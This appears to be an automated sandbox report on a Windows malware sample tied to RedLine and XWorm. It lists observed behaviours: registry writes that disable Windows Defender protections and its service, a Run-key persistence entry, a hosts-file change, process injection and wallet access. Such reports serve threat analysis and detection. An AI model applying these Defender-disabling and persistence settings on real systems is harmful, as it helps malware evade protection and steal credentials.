Analysis Overview
Threat Level: Known bad
The file https://google.com was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies security service
RedLine
RedLine payload
Blocklisted process makes network request
Stops running service(s)
Downloads MZ/PE file
Drops file in Drivers directory
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Modifies registry class
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-09-19 13:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-19 13:25
Reported
2023-09-19 13:35
Platform
win10-20230915-en
Max time kernel
524s
Max time network
567s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
| PID 3508 created 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\PL.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Msconf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\msvcp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftPE = "\"C:\\Users\\Admin\\AppData\\Roaming\\MicrosoftServerContact\\MicrosoftPE.exe\" " | C:\Users\Admin\AppData\Local\Temp\msvcp.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4076 set thread context of 2120 | N/A | C:\Users\Admin\Desktop\XWorm5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1200 set thread context of 2132 | N/A | C:\Users\Admin\AppData\Local\Temp\Msconf.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3508 set thread context of 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\PL.exe | C:\Windows\System32\dialer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\3877292338.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\810424605.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\3877292338.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\810424605.pri | C:\Windows\system32\taskmgr.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\XWorm5.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133396035513862666" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000000c00992db9e7d901a8a28e9ffdead901a8a28e9ffdead90114000000 | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "3" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Windows\system32\mspaint.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\mspaint.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\System32\sc.exe | N/A |
